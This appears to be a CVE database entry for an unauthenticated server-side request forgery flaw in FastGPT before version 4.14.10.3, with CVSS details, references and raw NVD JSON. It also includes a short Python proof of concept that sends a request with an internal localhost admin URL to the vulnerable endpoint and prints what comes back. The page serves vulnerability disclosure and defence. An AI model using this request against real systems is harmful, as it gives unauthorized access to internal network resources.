CVE-2026-40100

Description

FastGPT is an AI Agent building platform. Prior to 4.14.10.3, the /api/core/app/mcpTools/runTool endpoint accepts arbitrary URLs without authentication. The internal IP check in isInternalAddress() only blocks private IPs when CHECK_INTERNAL_IP=true, which is not the default. This allows unauthenticated attackers to perform SSRF against internal network resources. This vulnerability is fixed in 4.14.10.3.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fastgpt:fastgpt:*:*:*:*:*:*:*:* - VULNERABLE

FastGPT < 4.14.10.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable FastGPT instance
target_url = "http://target-host/api/core/app/mcpTools/runTool"

# Malicious payload targeting an internal service (e.g., localhost admin panel)
payload = {
    "url": "http://127.0.0.1:8080/admin"
}

try:
    # Sending the unauthenticated request
    response = requests.post(target_url, json=payload, timeout=10)
    
    # Checking if the internal resource was accessed (SSRF indication)
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: SSRF successful.")
        print("[+] Response from internal resource:")
        print(response.text)
    else:
        print("[-] Request failed or target patched.")

except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40100
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40100
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40100/
[4] VulDB https://vuldb.com/cve/CVE-2026-40100
[5] https://github.com/labring/FastGPT/security/advisories/GHSA-jrhc-f3j7-f8g4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40100", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:12.997", "lastModified": "2026-04-15T19:02:57.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastGPT is an AI Agent building platform. Prior to 4.14.10.3, the /api/core/app/mcpTools/runTool endpoint accepts arbitrary URLs without authentication. The internal IP check in isInternalAddress() only blocks private IPs when CHECK_INTERNAL_IP=true, which is not the default. This allows unauthenticated attackers to perform SSRF against internal network resources. This vulnerability is fixed in 4.14.10.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fastgpt:fastgpt:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.14.10.3", "matchCriteriaId": "2E93E71B-0D3A-4C6D-9679-EC1FA760E111"}]}]}], "references": [{"url": "https://github.com/labring/FastGPT/security/advisories/GHSA-jrhc-f3j7-f8g4", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}